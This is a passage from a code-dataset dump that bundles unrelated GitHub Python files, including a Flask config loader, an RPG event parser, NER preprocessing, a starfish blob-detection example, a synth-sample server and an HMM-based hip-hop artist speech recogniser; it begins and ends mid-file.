rt])\n \n #add data into 'tabData' that I use to create accuracy and rt histograms\n tabData[i][0] = shortSound \n tabData[i][1] = trueOrFalse\n tabData[i][2] = rt\n \n fixcross.present()\n exp.clock.wait(1000)\n i += 1 #add 1 to i. Loop keeps going until i reaches 16\n \n \nexpyriment.control.end(goodbye_text= 'Thanks for taking part to this experiment, see you soon')\n \nAccuracyPlot(tabData) #show accuracy histogram\nRTplot(tabData) #show rt histogram\n \n","repo_name":"Leoyop/PCBS_Looking-while-listening_task","sub_path":"PCBS_Looking_while_listening.py","file_name":"PCBS_Looking_while_listening.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38791425648","text":"import ConfigParser\nimport logging\nimport logging.handlers\n\nclass ConfigurationIni(object):\n CONFIGS = [\n ('DEBUG', bool),\n ('SQLALCHEMY_DATABASE_URI', str),\n ('SQLALCHEMY_ECHO', bool),\n ('LOG_FILE', str),\n ('LOG_FILE_MAX_BYTES', int)\n ]\n\n def __init__(self, filename, section_name='flask'):\n #Parsed configuration will be stored here\n self.configuration = {}\n\n self._cfg = ConfigParser.SafeConfigParser()\n self._cfg.read(filename)\n\n #Now parse the ini section and load it into configuration dict\n self._parse_ini_file(section_name)\n\n\n def _parse_ini_file(self, section_name):\n parse_mapping = {\n bool: self._cfg.getboolean,\n int: self._cfg.getint,\n float: self._cfg.getfloat,\n str: self._cfg.get,\n }\n\n for cfg, _type in ConfigurationIni.CONFIGS:\n cfg_lower = cfg.lower()\n if self._cfg.has_option(section_name, cfg_lower):\n val = parse_mapping[_type](section_name, cfg_lower)\n if val is not None:\n self.configuration[cfg] = val\n\n def load_configuration(self, app):\n for key, value in self.configuration.iteritems():\n app.config[key] = value\n\ndef configure_app(app, filename='config.ini'):\n \"\"\"\n :type app: flask.Flask\n :return:\n \"\"\"\n config_ini = ConfigurationIni(filename)\n\n #apply the configuration to our app!\n config_ini.load_configuration(app)\n\n #Apply logging\n log_file_handler = logging.handlers.RotatingFileHandler(\n app.config.get('LOG_FILE', app.name + '.log'),\n maxBytes=app.config.get('LOG_FILE_MAX_BYTES', 10000),\n backupCount=1\n )\n log_file_handler.setLevel(logging.DEBUG if app.debug else logging.ERROR)\n\n app.logger.addHandler(log_file_handler)\n","repo_name":"Rastii/BilliardStats","sub_path":"BilliardStats/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19949057025","text":"import re\nimport os\nfrom ..classes.locations.event import Event, Choice, Choices, EventOutcome\n\ndef parse_event_outcome(outcome_description, arguments, item_dict, monster_dict):\n \"\"\"Create an EventOutcome object from the outcome description and arguments.\"\"\"\n # Parse and create Items, Special Effects, Attacks, Spells, Monsters, etc. from arguments\n effects = {\n \"items\" : [],\n \"special_effect\" : None,\n \"attacks\" : [],\n \"spells\" : [],\n \"monsters\" : [],\n \"incomplete\" : False,\n \"location_change\" : None,\n \"new_event\" : None,\n \"stay_in_event\" : False,\n \"lose_item\" : None,\n \"gold_change\" : 0,\n \"hp\" : 0\n }\n\n items_pattern = re.compile(r'\\\\\\[\\[\\[(.*?)\\]\\]\\]')\n monsters_pattern = re.compile(r'\\\\\\[\\[\\[(.*?)\\]\\]\\]')\n\n for arg in arguments:\n key, value = arg.split('=')\n key = key.replace('-', '').lower().strip()\n\n if key == 'items':\n item_matches = items_pattern.findall(value)\n items = [item_dict[item_name.strip().lower()] for item_name in item_matches if item_name.strip().lower() in item_dict]\n effects[\"items\"] = items\n elif key == 'monsters':\n monster_matches = monsters_pattern.findall(value)\n monsters = [monster_dict[monster_name.strip().lower()] for monster_name in monster_matches if monster_name.strip().lower() in monster_dict]\n effects[\"monsters\"] = monsters\n else:\n # Convert numeric values to integers\n if value.isdigit():\n effects[key] = int(value)\n else:\n effects[key] = value\n \n # Create the EventOutcome object with all the gathered information\n return EventOutcome(outcome_description, items=effects[\"items\"], special_effect=effects[\"special_effect\"],\n attacks=effects[\"attacks\"], spells=effects[\"spells\"], monsters=effects[\"monsters\"],\n incomplete=effects[\"incomplete\"], location_change=effects[\"location_change\"],\n new_event=effects[\"new_event\"], stay_in_event=effects[\"stay_in_event\"],\n lose_item=effects[\"lose_item\"], gold_change=effects[\"gold_change\"], health_change=effects[\"hp\"])\n\ndef parse_choice(choice_text, item_dict, monster_dict):\n lines = choice_text.strip().split('\\n')\n description = lines[0].split(':')[1].strip()\n outcome_description = lines[1].split(':')[1].strip()\n arguments = lines[2:]\n \n outcome = parse_event_outcome(outcome_description, arguments, item_dict, monster_dict)\n return Choice(description, outcome)\n\ndef parse_event_file(file_path, player, item_dict, monster_dict):\n event_name = os.path.basename(file_path).replace('.md', '').replace('_', ' ').title()\n \n with open(file_path, 'r') as file:\n content = file.read()\n\n # Split the content by sections and remove any empty lines or irrelevant headers\n sections = content.split('##')\n description = sections[1].strip()\n # First, split the entire choices section into lines\n choices_lines = sections[2].strip().split('\\n')\n \n # Then, group lines into choices\n choices_text = []\n current_choice = []\n for line in choices_lines:\n if line.startswith('Description:') and current_choice:\n # When we hit a new 'Description:', we join the current choice's lines and reset for the next one\n choices_text.append('\\n'.join(current_choice).strip())\n current_choice = [line] # Start new choice with current line\n elif line.strip() and not line.startswith('Choices:'):\n # Otherwise, add line to current choice\n current_choice.append(line)\n \n # Don't forget to \n # add the last choice if it exists\n if current_choice:\n choices_text.append('\\n'.join(current_choice).strip())\n \n # Assuming that parse_choice function correctly processes each individual choice text\n choices = [parse_choice(choice, item_dict, monster_dict) for choice in choices_text]\n choices_object = Choices(choices)\n\n event = Event(name=event_name, description=description, choices=choices_object, player=player)\n return event\n\n# Usage\ndef generate_event_dict(tier, player, item_dict, monster_dict):\n \"\"\"Generate a dictionary of events for a given tier.\"\"\"\n event_directory = os.path.join(os.path.dirname(__file__),'..', f'vault/t{tier}/events')\n event_directory = os.path.normpath(event_directory)\n event_dict = {}\n\n for filename in os.listdir(event_directory):\n if filename.endswith('.md'):\n file_path = os.path.join(event_directory, filename)\n event = parse_event_file(file_path, player, item_dict, monster_dict)\n event_name = filename.rstrip('.md') # This assumes the filename without .md is the event's name\n event_dict[event_name] = event\n\n return event_dict\n\n","repo_name":"scicluna/clirpg","sub_path":"parsers/parseevent.py","file_name":"parseevent.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5548744681","text":"def kWeakestRows(mat, k: int):\n \n # Rows\n m = len(mat)\n \n # Columns\n n = len(mat[0])\n \n # In Brute Force approach, For each row, we are traversing the whole row to count the soldiers\n # Suppose if whole row has soldiers only. In that case, we will traverse the whole row\n \n # Since we already know that soldiers stand in front of civilians\n # It means, as soon as we encounter a civilian, there is no soldier on the right\n # So, basically, each row is in a sorted order\n # And so, to count soldiers, we can use Binary Search instead\n \n # Each data will be a pair (soldierCount, rowIndex)\n rowData = []\n \n # Go through each row\n for i in range(m):\n \n # Count of soldiers\n count = 0\n \n # Use Binary search\n \n # Index of rigtmost soldier in row after which all are civilians\n indexOfRightMostSoldier = -1\n \n start = 0\n end = n - 1\n \n while start <= end:\n \n mid = start + (end - start) // 2\n \n # If at \"mid\" we have a soldier\n # It may or may not be the rightmost soldier\n # So, we save its index and keep searching on right side of mid\n if mat[i][mid] == 1:\n indexOfRightMostSoldier = mid\n start = mid + 1\n \n # If at \"mid\" we have a civilian, there cannot be a soldier on right\n # So, we search on left side of mid for the index of rightmost soldier\n else: end = mid - 1\n \n # If there are soldiers in this row, the index will not be -1\n if indexOfRightMostSoldier != -1: count = indexOfRightMostSoldier + 1\n \n # Add the count and the index of the row in the rowData\n rowData.append((count, i))\n \n # Finally, sort the rowData in inreasing order based on count\n rowData.sort()\n \n # And finally, return the \"k\" weakest rows\n return [pair[1] for pair in rowData][:k]\n\n\nmat = [[1,1,0,0,0],\n [1,1,1,1,0],\n [1,0,0,0,0],\n [1,1,0,0,0],\n [1,1,1,1,1]]\nk = 3\n\nprint(\"Output -> \", kWeakestRows(mat,k))\n\n","repo_name":"itsarvindhere/heap","sub_path":"003. The K Weakest Rows in a Matrix/BinarySearchSorting.py","file_name":"BinarySearchSorting.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26755012573","text":"import os\nimport logging\n\nlogger = logging.getLogger('ner.prep.wikiann')\n\n\ndef clean(args) -> None:\n data = ''\n invalid = {\"''\", \"'\", \"]]\", \"[[\", \"==\", \"**\", \"``\"}\n counter = 0\n sent_id = 0\n prefix = args.lang + ':'\n with open(os.path.join(args.process_file_name), 'rt', encoding='utf-8') as fp:\n line = 'whatever'\n while line:\n line = fp.readline()\n if line == '\\n':\n if counter > 0:\n data += '\\n'\n counter = 0\n continue\n if line == '':\n continue\n tokens = line.split('\\t')\n if tokens[0] and tokens[0].startswith(prefix):\n tokens[0] = tokens[0][len(prefix):]\n if tokens[0] in invalid:\n continue\n if tokens[0].startswith(\"''\"):\n tokens[0] = tokens[0][2:]\n if tokens[0].startswith(\"**\"):\n tokens[0] = tokens[0][2:]\n if counter == 0:\n data += '# sent_id = ' + str(sent_id) + '\\n'\n sent_id += 1\n if counter == 0 and tokens[0] == '-':\n continue\n if counter == 0 and tokens[0] == '–':\n continue\n if counter == 0 and tokens[0] == ',':\n continue\n if counter == 0 and tokens[0] == ')':\n continue\n data += str(counter) + '\\t' + tokens[0] + '\\t' + tokens[1]\n counter += 1\n\n with open(os.path.join(args.process_file_name), 'wt', encoding='utf-8') as fp:\n fp.write(data)\n\n\ndef default_conf(args):\n conf = {\n 'type': 'wikiann',\n 'lang': args.lang,\n 'zip': args.lang + '-wann.zip',\n 'proc_file': args.lang + '_wann',\n 'result_name': args.lang + '_wann',\n 'ner_conll_idx': 2,\n 'map_filter': {\n 'max_seq_len': 128\n }\n }\n return conf\n","repo_name":"ivlcic/neuroticla","sub_path":"neuroticla/ner/prep/wikiann.py","file_name":"wikiann.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36574131277","text":"\n## Python Crash Course\n\n# Exercise 3.4: Guest List: \n# If you could invite anyone, living or deceased, to dinner, who would you invite? \n# Make a list that includes at least three people you’d like to invite to dinner . \n# Then use your list to print a message to each person, inviting them to dinner .\n\ndef main():\n \n # Prepare empty list for invitees \n dinnerInvitees = []\n\n # Add invitees one by one in the invitees list\n dinnerInvitees.append('Andrew Ng')\n dinnerInvitees.append('Narendra Modi')\n dinnerInvitees.append('Jordon')\n \n # Send invitation to invitees\n for i in range(len(dinnerInvitees)):\n \n # Generic greeting message\n greetingMessage = \"Hi \" + str(dinnerInvitees[i]) + \", it's my birthday today, would you join us for the dinner? \" \\\n \"\\nWe also have following guests joining us: \"\n \n # Create list of other guests at the dinner \n listOfInvitees = dinnerInvitees.copy()\n del listOfInvitees[i]\n \n # Print invitation\n print(\"\\n### \\t Birthday Bash \\t ###\")\n print(greetingMessage)\n\n # Print list of other guests\n for x in range(len(listOfInvitees)):\n print(listOfInvitees[x])\n\n # Print end of invitation \n print(\"\\n###########################\\n\\n\") \n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"akshaymoharir/PythonCrashCourse","sub_path":"chapter_3/ex_3-4.py","file_name":"ex_3-4.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18040063484","text":"\"\"\"\n.. _howto_blobdetector:\n\nFinding Spots with :py:class:`.BlobDetector`\n============================================\n\nRNA FISH spots are usually bright point spread functions in a greyscale image.\n:term:`Rolonies`, which are rolling-circle amplicons produced in certain assays (e.g. in\nsitu sequencing), are approximately 1-um diameter Gaussian spots. Despite their minor differences in\nsize and intensity profiles, these \"blobs\" can be detected using a common computer vision\ntechnique that convolves kernels with an image to identify where the blobs are. The kernels,\nor filters as they are sometimes called, find spots that are the same size as it.\n\nStarfish implements this blob detection technique with :py:class:`.BlobDetector`. It supports three\n`approaches `_\nthat can be chosen with the ``detector_method`` argument when instantiating the\ndetector. The default LoG approach produces the most accurate results and should be used unless\ncomputation time becomes a concern.\n\nIn order to detect spots of various sizes in the same set of images, :py:class:`.BlobDetector`\nconvolves kernels of multiple sizes and picks the best fit for each spot. The kernel sizes are\ndefined by sigma, which is the standard deviation of the Gaussian used in each approach. The user\nmust define the range of sigmas to be used with the ``min_sigma``, ``max_sigma`` and ``num_sigma``\narguments. Picking the right sigma requires looking at the images and approximating the size of\nspots. Using a wider range of sizes and increasing ``num_sigma`` can find more spots but will\nrequire more computation time and possibly capture noise that is not the correct size as true RNA\nspots. That is why it is recommended to only choose sigmas that make sense for the experiment and\nmicroscope settings. The table below is a helpful guide for setting the sigma parameters based on\nradii of spots.\n\n.. list-table::\n :widths: auto\n :header-rows: 1\n\n * - Approach\n - Sigma =\n * - LoG 2D\n - radius / sqrt(2)\n * - LoG 3D\n - radius / sqrt(3)\n * - DoG 2D\n - radius / sqrt(2)\n * - DoG 3D\n - radius / sqrt(3)\n * - DoH\n - radius\n\nAnother parameter of :py:class:`.BlobDetector` is ``threshold``, which filters out spots with\nlow intensities that are likely background noise. One way to set ``threshold`` is to choose a\nconservatively low value to start with on a representative image and :ref:`visually assess\n` results. If the image has a high SNR the ``threshold`` is trivial but\nif there is high background, then choosing the right ``threshold`` value can become subjective.\nAnother way to estimate ``threshold`` is :ref:`howto_localmaxpeakfinder` and examining the\nintensities of the spots.\n\n.. warning::\n :py:class:`.BlobDetector` is not compatible with cropped data sets.\n\n\"\"\"\n\n# Load in situ sequencing experiment\nfrom starfish.image import ApplyTransform, LearnTransform, Filter\nfrom starfish.types import Axes\nfrom starfish import data, FieldOfView\nfrom starfish.spots import FindSpots\nfrom starfish.util.plot import imshow_plane\nexperiment = data.ISS()\nfov = experiment.fov()\nimgs = fov.get_image(FieldOfView.PRIMARY_IMAGES) # primary images\ndots = fov.get_image(\"dots\") # reference round where every spot labeled with fluorophore\n\n# filter raw data\nmasking_radius = 15\nfilt = Filter.WhiteTophat(masking_radius, is_volume=False)\nfilt.run(imgs, in_place=True)\nfilt.run(dots, in_place=True)\n\n# register primary images to reference round\nlearn_translation = LearnTransform.Translation(reference_stack=dots, axes=Axes.ROUND, upsampling=1000)\ntransforms_list = learn_translation.run(imgs.reduce({Axes.CH, Axes.ZPLANE}, func=\"max\"))\nwarp = ApplyTransform.Warp()\nwarp.run(imgs, transforms_list=transforms_list, in_place=True)\n\n# view dots to estimate radius of spots: radius range from 1.5 to 4 pixels\nimshow_plane(dots, {Axes.X: (500, 550), Axes.Y: (600, 650)})\n\n# run blob detector with dots as reference image\n# following guideline of sigma = radius/sqrt(2) for 2D images\n# threshold is set conservatively low\nbd = FindSpots.BlobDetector(\n min_sigma=1,\n max_sigma=3,\n num_sigma=10,\n threshold=0.01,\n is_volume=False,\n measurement_type='mean',\n)\nspots = bd.run(image_stack=imgs, reference_image=dots)","repo_name":"spacetx/starfish","sub_path":"examples/how_to/blob_detector.py","file_name":"blob_detector.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"43785079711","text":"from routes.endpoints.endpoint_classes import *\n\nNUTRITION_DAY_EP = Endpoint('/nutrition/days') \\\n .add_method(GET, \n EndpointMethod(name='get all days with nutrition data or get a speciic day with nutritional data') \\\n .add_param_arg('date', EndpointArgument(DATE, optional=True))\n ) \\\n .add_method(POST,\n EndpointMethod(name='create day with nutrition data') \\\n .add_body_arg('date', EndpointArgument(DATE))\n .add_body_arg('entries', EndpointArgument(LIST) \\\n .add_subarg('0', EndpointArgument(JSON) \\\n .add_subarg('ndbno', EndpointArgument(NUMBER)) \\\n .add_subarg('amount', EndpointArgument(NUMBER) ) \\\n .add_subarg('unit', EndpointArgument(STRING))))\n ) \\\n .add_method(PUT,\n EndpointMethod(name='edit day with nutrition data') \\\n .add_body_arg('date', EndpointArgument(DATE))\n .add_body_arg('entries', EndpointArgument(LIST, optional=True) \\\n .add_subarg('0', EndpointArgument(JSON, optional=True) \\\n .add_subarg('ndbno', EndpointArgument(NUMBER)) \\\n .add_subarg('amount', EndpointArgument(NUMBER)) \\\n .add_subarg('unit', EndpointArgument(STRING)) \\\n .add_subarg('label', EndpointArgument(STRING))))\n ) \\\n .add_method(DELETE,\n EndpointMethod(name='delete day with nutrition data') \\\n .add_body_arg('date', EndpointArgument(DATE))\n )","repo_name":"weimingw/weiming-portfolio","sub_path":"weiming-backend/routes/endpoints/nutrition_endpoints.py","file_name":"nutrition_endpoints.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11861666108","text":"#!/usr/bin/python3\nif __name__ == \"__main__\":\n import sys\n ac = len(sys.argv)\n\n if ac == 1:\n print(\"0\")\n\n elif ac > 1:\n sum = 0\n for i in range(1, ac):\n sum = sum + int(sys.argv[i])\n\n print(\"{:d}\".format(sum))\n","repo_name":"zabimaru1000/holbertonschool-higher_level_programming","sub_path":"0x02-python-import_modules/3-infinite_add.py","file_name":"3-infinite_add.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70860551146","text":"from flask import Flask\nfrom flask import Response\nfrom flask import request\nfrom flask_api import status\nfrom flask_cors import CORS\nimport json\n\nfrom lib.db import Database\nfrom lib.db.models.synth_button_setting import SynthButtonSetting\nfrom lib.db.models.wav_file import WavFile\nfrom lib.http.controllers import synth_button_setting_controller\nfrom lib.http.controllers import wav_file_controller\nfrom lib.synth import AudioManager\n\n\ndef generate_flask_app(audio_manager: AudioManager) -> Flask:\n \"\"\"\n Generates a Flask application on demand. In a function, rather than a\n global objcet, to avoid the use of global variables.\n \"\"\"\n app = Flask(__name__)\n CORS(app)\n\n @app.route(\"/button/count\", methods=[\"GET\"])\n def get_button_count():\n return synth_button_setting_controller.get_synth_button_count()\n\n @app.route(\"/buttons\", methods=[\"GET\"])\n def get_synth_button_settings():\n synth_button_settings = (\n synth_button_setting_controller.get_synth_button_settings()\n )\n return Response(\n \"[\"\n + \",\".join(\n [\n synth_button_setting.to_json()\n for synth_button_setting in synth_button_settings\n ]\n )\n + \"]\",\n content_type=\"application/json\",\n )\n\n @app.route(\"/button/\", methods=[\"GET\"])\n def get_synth_button_setting(index: int):\n setting = synth_button_setting_controller.get_synth_button_setting(index)\n if setting is None:\n return \"\", status.HTTP_404_NOT_FOUND\n\n return Response(setting.to_json(), content_type=\"application/json\")\n\n @app.route(\"/button/\", methods=[\"PUT\"])\n def put_synth_button_setting(index: int):\n json = request.get_json()\n if json is None:\n return \"\", status.HTTP_415_UNSUPPORTED_MEDIA_TYPE\n\n setting = synth_button_setting_controller.put_synth_button_setting(\n index, json, audio_manager\n )\n if setting is None:\n return \"\", status.HTTP_400_BAD_REQUEST\n\n return Response(setting.to_json(), content_type=\"application/json\")\n\n @app.route(\"/samples\", methods=[\"GET\"])\n def get_samples():\n wav_files = wav_file_controller.get_samples()\n return Response(\n \"[\" + \",\".join([wav_file.to_json() for wav_file in wav_files]) + \"]\",\n content_type=\"application/json\",\n )\n\n @app.route(\"/sample/\", methods=[\"GET\"])\n def get_sample(id: str):\n wav_file = wav_file_controller.get_sample(id)\n if wav_file is None:\n return \"\", status.HTTP_404_NOT_FOUND\n _, data = wav_file\n\n return Response(data, content_type=\"audio/wav\")\n\n @app.route(\"/sample\", methods=[\"POST\"])\n def post_sample():\n file_name = \"sampleFile\"\n if file_name not in request.files or request.files[file_name].filename == \"\":\n return \"\", status.HTTP_400_BAD_REQUEST\n file = request.files[file_name]\n\n wav_file = wav_file_controller.post_sample(file.filename, file.read())\n\n return Response(\n json.dumps({\"id\": wav_file.id}), content_type=\"application/json\"\n )\n\n return app\n","repo_name":"crockeo/pyed-piper","sub_path":"server/lib/http/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29105843860","text":"def longestConsecutive(A):\n temp_dict = {}\n for i in range(len(A)):\n if A[i] not in temp_dict :\n temp_dict[A[i]] = i\n \n count = 0\n for i in range(len(A)):\n temp = 1\n if A[i]-1 not in temp_dict:\n val = A[i] + 1\n while val <= max(A):\n if val in temp_dict:\n val += 1\n temp += 1\n else:\n break\n count = max(temp, count)\n return count\n\nA = [100,4,200,1,3,2]\nA = [ 6, 4, 5, 2, 3 ]\nprint(longestConsecutive(A))","repo_name":"chithra-m/ds_code_snippets","sub_path":"course/longest_consecutive_element.py","file_name":"longest_consecutive_element.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19408321291","text":"# !/usr/bin/env python\n\nfrom prettytable import PrettyTable\nfrom utils import Word, WordHMM\nimport os\n\n#audio stuff\nimport pyaudio\nimport wave\nfrom sys import byteorder\nfrom array import array\nfrom struct import pack\nimport copy\n\n\n######################################\n# Data loading functions\n######################################\n\n\ndef load_data(data, category):\n os.chdir(category)\n for filename in os.listdir(os.getcwd()):\n if filename.endswith(\".wav\"):\n W = Word(category, filename)\n W.set_mfcc_matrix()\n data.append(W)\n os.chdir(\"..\")\n\n\ndef load_all_training_data(training_data_list, category_labels):\n os.chdir(\"Training_Data\")\n for category in category_labels:\n load_data(training_data_list, category)\n os.chdir(\"..\")\n\n\ndef load_all_testing_data(testing_data_list, category_labels):\n os.chdir(\"Testing_Data\")\n for category in category_labels:\n load_data(testing_data_list, category)\n os.chdir(\"..\")\n\n######################################\n# HMM FUNCTIONS\n######################################\n\n\ndef train_hmms(words, category_list):\n 'Train the Hmm'\n word_hmms = list()\n\n # create an HMM for each category\n for category in category_list:\n w = WordHMM(category)\n word_hmms.append(w)\n\n for word_hmm in word_hmms:\n for training_word in words:\n if training_word.get_category() == word_hmm.get_category():\n word_hmm.add_to_training_data(training_word.get_mfcc_matrix())\n\n # get hmm model\n num_components = 5\n if word_hmm.get_category() == 'Play' or word_hmm.get_category() == 'Wayne':\n num_components = 3\n\n if word_hmm.get_category() == 'Drake':\n num_components = 4\n\n if word_hmm.get_category() == 'Kendrick' or word_hmm.get_category() == 'Gambino'\\\n or word_hmm.get_category() == 'KendrickLamar':\n num_components = 6\n\n word_hmm.init_model_param(n_hidden_states=num_components, n_mixtures=3,\n covariance_type='diag', n_iter=10)\n word_hmm.get_hmm_model()\n\n normalize_categories(word_hmm)\n\n return word_hmms\n\n\ndef init_categories():\n artist_categories = list()\n artist_categories.append(\"Play\")\n artist_categories.append(\"Drake\")\n artist_categories.append(\"Kendrick\")\n artist_categories.append(\"Chance\")\n artist_categories.append(\"Kanye\")\n artist_categories.append(\"Wayne\")\n artist_categories.append(\"Snoop\")\n artist_categories.append(\"Gambino\")\n artist_categories.append(\"Eminem\")\n artist_categories.append(\"MacMiller\")\n artist_categories.append(\"PostMalone\")\n\n # below categories added to improve performance\n artist_categories.append(\"LilWayne\")\n artist_categories.append(\"KendrickLamar\")\n\n return artist_categories\n\n\ndef predict(test_words, word_hmms):\n ''' recognition '''\n predicted_category_list = list()\n\n for artist in test_words:\n scores = list()\n\n for recognizer in word_hmms:\n score = recognizer.wordhmm.score(artist.get_mfcc_matrix())\n scores.append(score)\n\n idx = scores.index(max(scores))\n predicted_category = word_hmms[idx].get_category()\n predicted_category_list.append(predicted_category)\n\n return predicted_category_list\n\n\ndef get_classification_rate(actual_value_list, predicted_value_list):\n num_correct = 0\n length1 = len(actual_value_list)\n length2 = len(predicted_value_list)\n\n if length1 != length2:\n raise ValueError(\"Lengths of list are not equal\")\n\n for i in range(length1):\n if actual_value_list[i] == predicted_value_list[i]:\n num_correct += 1\n\n return float(num_correct)/length1\n\n\ndef normalize_categories(artist):\n # normalize categories for words that had multiple training labels\n # Lil Wayne -> Wayne\n # Kendrick Lamar -> Kendrick\n # used to normalize both the HMM_category and the training / testing data categories\n\n if artist.get_category() == 'LilWayne':\n artist.set_category('Wayne')\n if artist.get_category() == 'KendrickLamar':\n artist.set_category('Kendrick')\n\n\n######################################\n# AUDIO RECORD FUNCTIONS\n# https://stackoverflow.com/questions/892199/detect-record-audio-in-python\n######################################\nTHRESHOLD = 500 # audio levels not normalised.\nCHUNK_SIZE = 1024\nSILENT_CHUNKS = 70\n# SILENT_CHUNKS = 3 * 44100 / 1024 # about 3sec\nFORMAT = pyaudio.paInt16\nFRAME_MAX_VALUE = 2 ** 15 - 1\nNORMALIZE_MINUS_ONE_dB = 10 ** (-1.0 / 20)\nRATE = 44100\nCHANNELS = 1\nTRIM_APPEND = RATE / 4\n\n\ndef is_silent(data_chunk):\n \"\"\"Returns 'True' if below the 'silent' threshold\"\"\"\n return max(data_chunk) < THRESHOLD\n\n\ndef normalize(data_all):\n \"\"\"Amplify the volume out to max -1dB\"\"\"\n # MAXIMUM = 16384\n normalize_factor = (float(NORMALIZE_MINUS_ONE_dB * FRAME_MAX_VALUE)\n / max(abs(i) for i in data_all))\n\n r = array('h')\n for i in data_all:\n r.append(int(i * normalize_factor))\n return r\n\n\ndef trim(data_all):\n _from = 0\n _to = len(data_all) - 1\n for i, b in enumerate(data_all):\n if abs(b) > THRESHOLD:\n _from = max(0, i - TRIM_APPEND)\n break\n\n for i, b in enumerate(reversed(data_all)):\n if abs(b) > THRESHOLD:\n _to = min(len(data_all) - 1, len(data_all) - 1 - i + TRIM_APPEND)\n break\n\n return copy.deepcopy(data_all[_from:(_to + 1)])\n\n\ndef record():\n \"\"\"Record a word or words from the microphone and\n return the data as an array of signed shorts.\"\"\"\n\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK_SIZE)\n\n silent_chunks = 0\n audio_started = False\n data_all = array('h')\n\n while True:\n # little endian, signed short\n data_chunk = array('h', stream.read(CHUNK_SIZE))\n if byteorder == 'big':\n data_chunk.byteswap()\n data_all.extend(data_chunk)\n\n silent = is_silent(data_chunk)\n\n if audio_started:\n if silent:\n silent_chunks += 1\n if silent_chunks > SILENT_CHUNKS:\n break\n else:\n silent_chunks = 0\n elif not silent:\n audio_started = True\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n data_all = trim(data_all) # we trim before normalize as threshhold applies to un-normalized wave (as well as is_silent() function)\n data_all = normalize(data_all)\n return sample_width, data_all\n\n\ndef record_to_file(path):\n \"Records from the microphone and outputs the resulting data to 'path'\"\n sample_width, data = record()\n data = pack('<' + ('h' * len(data)), *data)\n\n wave_file = wave.open(path, 'wb')\n wave_file.setnchannels(CHANNELS)\n wave_file.setsampwidth(sample_width)\n wave_file.setframerate(RATE)\n wave_file.writeframes(data)\n wave_file.close()\n\n\nif __name__ == '__main__':\n # LOAD TRAIN DATA\n print(\"Loading training data\")\n categories = init_categories()\n training_data = list()\n load_all_training_data(training_data, categories)\n print(\"Done loading training data\")\n print(\"\\n\")\n\n # TRAIN MODELS\n print(\"Training the word HMMs\")\n hip_hop_hmms = train_hmms(training_data, categories)\n print(\"Done training the word HMMs\")\n print(\"\\n\")\n\n # LOAD TESTING DATA\n print('Loading Testing Data')\n testing_data = list()\n load_all_testing_data(testing_data, categories)\n print('Done Loading Testing Data')\n print(\"\\n\")\n\n # Create true category labels for testing data\n true_category_list = list()\n for word in testing_data:\n # normalize categories for words that had multiple training\n normalize_categories(word)\n true_category_list.append(word.get_category())\n\n # PREDICT TESTING DATA\n print(\"Predicting Testing Data\")\n prediction = predict(testing_data, hip_hop_hmms)\n print(\"Done Predicting Testing Data\")\n print(\"\\n\")\n\n # present data so easy to see which examples are being marked incorrectly\n misclassified = PrettyTable(['Example Number', 'Real Value', 'Predicted Value'])\n\n # add misclassified examples\n for i in range(len(testing_data)):\n if testing_data[i].get_category() != prediction[i]:\n misclassified.add_row([i+1, testing_data[i].get_category(), prediction[i]])\n\n print(\"Overall classification rate is {}\".format(get_classification_rate(prediction, true_category_list)))\n print(\"\\n\")\n print(\"The following table has the misclassified examples real and predicted values:\\n\")\n print(misclassified)\n","repo_name":"lucasklawrence/hiphop_artist_recognition","sub_path":"artist_recognition.py","file_name":"artist_recognition.py","file_ext":"py","file_size_in_byte":8787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1843350219","text":"import torch\nimport torch.utils.data as data\nimport os\nimport numpy as np\nimport json\nfrom PIL import Image\nfrom .utils import load_pc, get_rays, PointCloud, load_pc_np, setup_scene, get_proj_matrix\nfrom torchvision import transforms as T\nimport time\n\nfrom .rasterizer import MultiscaleRender\nfrom .shader import NNScene\nfrom glumpy import app, gloo, gl\n\nclass nerfDataset(data.Dataset):\n\n def __init__(self, args, split, mode):\n \n self.img_wh = (args.W, args.H)\n self.device = args.device\n self.pc_dir = args.pcdir\n self.mode = mode\n\n datadir = args.datadir\n self.blender2opencv = np.array([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\n with open(os.path.join(datadir, 'transforms_' + split + '.json'), 'r') as f:\n self.meta = json.load(f)\n self.transform = T.ToTensor()\n focal = 0.5 * 800 / np.tan(0.5 * self.meta['camera_angle_x']) \n focal *= self.img_wh[0] / 800\n self.intrinsic = torch.tensor([[focal, 0, self.img_wh[0] / 2], [0, focal, 